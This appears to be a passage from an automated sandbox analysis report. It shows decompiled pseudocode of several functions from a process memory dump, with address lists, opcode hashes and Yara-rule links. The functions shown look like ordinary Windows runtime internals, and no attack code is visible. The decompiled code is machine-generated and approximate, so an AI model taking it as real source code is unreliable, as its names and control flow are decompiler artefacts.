						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x2a453e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x2a453e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x293bc46;
						_t48 = E029D7B9C(0x2a453e8, 0x293bc46, _t67, 0x2a453e8, _t70,  &_v140);
					}
				}
				return E0299B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x02998ec7
0x02998ed9
0x02998edc
0x02998ee6
0x02998ee9
0x02998eee
0x02998efc
0x02998f08
0x029d1349
0x029d1353
0x029d135d
0x029d1366
0x029d136f
0x029d1375
0x029d137c
0x029d1385
0x029d1390
0x029d1391
0x029d139c
0x029d139d
0x029d13a6
0x029d13ac
0x029d13b2
0x029d13b5
0x029d13bc
0x029d13bf
0x029d13c2
0x029d13c5
0x029d13c8
0x029d13cb
0x029d13ce
0x029d13d1
0x029d13d4
0x029d13d7
0x029d13da
0x029d13dd
0x029d13e0
0x029d13e3
0x029d13e6
0x029d13e9
0x029d13f6
0x029d1400
0x029d1400
0x02998f08
0x02998f32

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bcc8c7903195f8aa433d7d981e08183145286aab57e522d945eac2c12252053
Instruction ID: 2d6554dbc9fee1bf8f199a1522866e35200569e398e9d67c57768ea5ab13c84e
Opcode Fuzzy Hash: 8bcc8c7903195f8aa433d7d981e08183145286aab57e522d945eac2c12252053
Instruction Fuzzy Hash: CF4195B1D003189FDB60CFAAD981AAEFBF5FB48714F5041AEE509A7240DB749A45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0298E730, Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0298E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E02999670() < 0) {
					E029ADF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x2a47b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L02974620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0298E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x0298e730
0x0298e736
0x0298e738
0x0298e73d
0x0298e73e
0x0298e740
0x0298e749
0x0298e765
0x0298e76a
0x0298e76b
0x0298e76c
0x0298e76d
0x0298e76e
0x0298e76f
0x0298e775
0x0298e777
0x0298e77e
0x029cb675
0x0298e784
0x0298e784
0x0298e789
0x0298e7a8
0x0298e7ac
0x0298e807
0x0298e7ae
0x0298e7ae
0x0298e7b1
0x0298e7b4
0x0298e7b9
0x0298e7c0
0x0298e7c4
0x0298e7ca
0x0298e7cc
0x00000000
0x0298e7d3
0x0298e7d6
0x00000000
0x00000000
0x0298e7ff
0x0298e802
0x00000000
0x00000000
0x0298e7f9
0x0298e7fc
0x00000000
0x00000000
0x0298e7f3
0x0298e7f6
0x00000000
0x00000000
0x0298e7ed
0x0298e7f0
0x00000000
0x00000000
0x0298e7e7
0x0298e7ea
0x00000000
0x00000000
0x029cb685
0x029cb688
0x00000000
0x00000000
0x029cb682
0x00000000
0x00000000
0x0298e7cc
0x0298e7d9
0x0298e7dc
0x0298e7de
0x0298e7de
0x0298e7ac
0x0298e7e4
0x0298e74b
0x0298e751
0x0298e759
0x0298e761
0x0298e761

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f79c84f67fb9c52890315faa1d83c07dc9dec7e0e022a193d2c91fbce1db0b7
Instruction ID: a0a1545913bd59ae2419c9fa2c9a2635a5d2b14947b2ba53f44a9dd5f537dea2
Opcode Fuzzy Hash: 5f79c84f67fb9c52890315faa1d83c07dc9dec7e0e022a193d2c91fbce1db0b7
Instruction Fuzzy Hash: 4E318DB5A14249EFD704DF18C851B9AB7E8FB09314F18866AFA44CB341D731EC90CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0298BC2C, Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0298BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x2a46100; // 0x16
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E02972280(0xd, 0xd35f1a0);
				_t41 =  *0x2a460f8; // 0x0
				if(_t41 != 0) {
					 *0x2a460f8 =  *_t41;
					 *0x2a460fc =  *0x2a460fc + 0xffff;
				}
				E0296FFB0(_t41, 0x800, 0xd35f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x2a460f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L02974620(0x2a46100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x2a46100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x0298bc36
0x0298bc42
0x0298bc45
0x0298bc4a
0x0298bd35
0x00000000
0x00000000
0x00000000
0x00000000
0x0298bc50
0x0298bc50
0x0298bc58
0x0298bc5a
0x0298bc60
0x00000000
0x00000000
0x029ca4f2
0x029ca4f6
0x00000000
0x00000000
0x00000000
0x029ca4fc
0x0298bc79
0x0298bc7e
0x0298bc86
0x0298bd16
0x0298bd20
0x0298bd20
0x0298bc8d
0x0298bc94
0x0298bcbd
0x0298bcca
0x0298bccb
0x0298bccc
0x0298bccd
0x0298bcce
0x0298bcd4
0x0298bcea
0x0298bcee
0x0298bcf2
0x0298bd00
0x0298bd04
0x00000000
0x0298bc96
0x0298bcab
0x0298bcaf
0x0298bd2c
0x0298bd2c
0x0298bd09
0x00000000
0x0298bd09
0x0298bcb1
0x0298bcb5
0x0298bcbb
0x00000000
0x00000000
0x00000000
0x0298bcbb

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71d51beff28a65b8221c80abe5d97885d2701cee418b65c6c6f2a593128403e8
Instruction ID: 52065fa5f7c09fc078f4446a615f5fe47e42c8e1b8969486f0b1b970b4746704
Opcode Fuzzy Hash: 71d51beff28a65b8221c80abe5d97885d2701cee418b65c6c6f2a593128403e8
Instruction Fuzzy Hash: 8831E176A00616ABCB11EF58D4907A673A8FF99718F084479ED48DB201EB75E90ACB90

Uniqueness

Uniqueness Score: -1.00%

Function 02959100, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E02959100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x2a2f6e8);
				E029AD0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E02A288F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E029AD130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x2a486c0; // 0xaa07b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x2a486b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E02972280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E02A288F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0299AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x2a4b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x2a484c0;
										if(_t69 >=  *0x2a484c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E02A29063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0295922A(_t82);
							_t53 = E02977D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E02A28B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x2a486c0; // 0xaa07b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x2a486b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x2a486bc;
										_t72 = 0x2a486b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E02959240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x2a486c4;
									_t72 = 0x2a486c0;
									L18:
									E02989B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x02959100
0x02959100
0x02959100
0x02959100
0x02959102
0x02959107
0x0295910c
0x02959110
0x02959115
0x02959136
0x02959143
0x029b37e4
0x029b37e4
0x02959149
0x0295914e
0x0295914e
0x02959117
0x0295911d
0x00000000
0x00000000
0x0295911f
0x02959125
0x00000000
0x02959151
0x02959158
0x0295915d
0x02959161
0x02959168
0x029b3715
0x00000000
0x0295916e
0x0295916e
0x02959175
0x02959177
0x0295917e
0x0295917f
0x02959182
0x02959182
0x02959187
0x02959187
0x0295918a
0x0295918d
0x0295918f
0x02959192
0x02959195
0x02959198
0x02959198
0x02959198
0x0295919a
0x00000000
0x00000000
0x029b371f
0x029b3721
0x029b3727
0x029b372f
0x029b3733
0x029b3735
0x029b3738
0x029b373b
0x029b373d
0x029b3740
0x00000000
0x00000000
0x029b3746
0x029b3749
0x00000000
0x00000000
0x029b374f
0x029b3751
0x00000000
0x00000000
0x029b3757
0x029b3759
0x029b375c
0x029b375c
0x029b375e
0x029b375e
0x029b3761
0x029b3764
0x00000000
0x00000000
0x029b3766
0x029b3768
0x029b37a3
0x029b37a3
0x029b37a5
0x029b37a7
0x029b37ad
0x029b37b0
0x029b37b2
0x029b37bc
0x029b37c2
0x029b37c2
0x029b37b2
0x02959187
0x02959187
0x0295918a
0x0295918d
0x0295918f
0x02959192
0x02959195
0x00000000
0x02959195
0x00000000
0x02959187
0x029b376a
0x029b376a
0x029b376c
0x029b376c
0x029b376f
0x029b3775
0x00000000
0x00000000
0x029b3777
0x029b3779
0x00000000
0x00000000
0x029b3782
0x029b3787
0x029b3789
0x029b3790
0x029b3790
0x029b378b
0x029b378b
0x029b378b
0x029b3792
0x029b3795
0x029b3795
0x029b3798
0x029b3798
0x029b379b
0x029b379b
0x029591a3
0x029591a9
0x029591b0
0x029591b4
0x029591b4
0x029591bb
0x029591c0
0x029591c5
0x029591c7
0x029b37da
0x029591cd
0x029591cd
0x029591cd
0x029591d2
0x029591d5
0x02959239
0x02959239
0x029591d7
0x029591db
0x029591e1
0x029591e7
0x029591fd
0x02959203
0x0295921e
0x02959223
0x00000000
0x02959223
0x02959205
0x02959208
0x0295920c
0x02959214
0x02959214
0x029591e9
0x029591e9
0x029591ee
0x029591f3
0x029591f3
0x029591f3
0x029591e7
0x00000000
0x029591db
0x02959187
0x02959168

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a9b40bb90742085b196de309c9578ae5a4cd0c969b71afa64c52218cb38d124
Instruction ID: b5ba8263be958a6b88b43db6f95bb30bedeb41ba8e0bdee4d533dd3a7ceefab4
Opcode Fuzzy Hash: 9a9b40bb90742085b196de309c9578ae5a4cd0c969b71afa64c52218cb38d124
Instruction Fuzzy Hash: D531BE75B002B4DFFB25DB68C588BACBBF6BF89354F188549C80567240C739A980CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 02981DB5, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E02981DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0297F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L02974620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0297F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x02981dc2
0x02981dc5
0x02981dc7
0x02981dcc
0x02981dce
0x02981dd6
0x02981ddf
0x02981de0
0x02981de1
0x02981de5
0x02981de8
0x02981def
0x02981df0
0x02981df6
0x02981df7
0x02981dfe
0x02981e1a
0x00000000
0x00000000
0x02981e0b
0x02981e12
0x02981e12
0x02981e00
0x02981e00
0x02981e05
0x02981e1e
0x02981e23
0x029c570f
0x029c5713
0x00000000
0x00000000
0x029c5719
0x029c5719
0x02981e2c
0x02981e2d
0x02981e2e
0x02981e2f
0x02981e31
0x02981e32
0x02981e35
0x02981e3d
0x029c5723
0x029c573d
0x029c573d
0x00000000
0x029c5723
0x02981e49
0x02981e4e
0x02981e4e
0x02981e09
0x00000000

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: d4641cf5fe73960ae9855fb47a34de46a0facb109294399c20d3e0a0dedcd58e
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: 2E219C72600118EBC720EF99CC84EAABBBDFF85744F194065E909D7221D770AE02CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 029D6C0A, Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E029D6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E02977D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x2a47b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L02974620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0299F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E02977D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E02999AE0();
						_t23 = L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x029d6c0a
0x029d6c0f
0x029d6c10
0x029d6c13
0x029d6c15
0x029d6c19
0x029d6c1c
0x029d6c21
0x029d6c28
0x029d6c3a
0x029d6c2a
0x029d6c33
0x029d6c33
0x029d6c3f
0x029d6c48
0x029d6c4d
0x029d6c60
0x029d6c65
0x029d6c69
0x029d6c73
0x029d6c79
0x029d6c7f
0x029d6c86
0x029d6c90
0x029d6c94
0x029d6ca6
0x029d6cb2
0x029d6cbd
0x029d6cbd
0x029d6cc3
0x029d6cc7
0x029d6ccb
0x029d6cd0
0x029d6cd1
0x029d6ce2
0x029d6ce2
0x029d6c69
0x029d6ced

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38ea701ffe03a6d2fb8bd73bc8a629766cefd03fe06ca0d5b53942a531bb0865
Instruction ID: 3d36448b7ce96289768b85505bb148f9bfd48394e802739d3f9f558ed46a5022
Opcode Fuzzy Hash: 38ea701ffe03a6d2fb8bd73bc8a629766cefd03fe06ca0d5b53942a531bb0865
Instruction Fuzzy Hash: CF219AB1A00644ABC711DBA8D880E6AB7BCFF88744F044469F904C7791E734E911CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 029990AF, Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E029990AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E029AD4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0298E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L02974620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0299F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0298A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x029990af
0x029990b8
0x029990bb
0x029990bf
0x029990c2
0x029990c2
0x029990c8
0x029990cb
0x029990cd
0x029d14d7
0x029d14eb
0x029d14eb
0x00000000
0x029d14eb
0x029d14db
0x029d14e6
0x00000000
0x029d14f2
0x029d14e8
0x00000000
0x029d14e8
0x029990d8
0x029990da
0x029990dd
0x029990e5
0x00000000
0x02999139
0x029990fa
0x029990fe
0x02999142
0x00000000
0x02999142
0x02999104
0x02999107
0x0299910b
0x02999110
0x02999118
0x02999147
0x02999148
0x0299914f
0x02999150
0x02999151
0x02999152
0x02999156
0x0299915d
0x02999160
0x02999168
0x0299916c
0x029991bc
0x029991be
0x00000000
0x029991be
0x0299916e
0x02999173
0x02999176
0x00000000
0x00000000
0x0299917c
0x02999180
0x029991b5
0x00000000
0x029991b5
0x02999182
0x02999185
0x02999189
0x00000000
0x00000000
0x0299918e
0x02999190
0x02999198
0x00000000
0x00000000
0x029991a0
0x00000000
0x029991ad
0x029991ad
0x029991b0
0x029991b1
0x00000000
0x02999185
0x0299911a
0x0299911c
0x0299911f
0x02999125
0x02999127
0x00000000

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

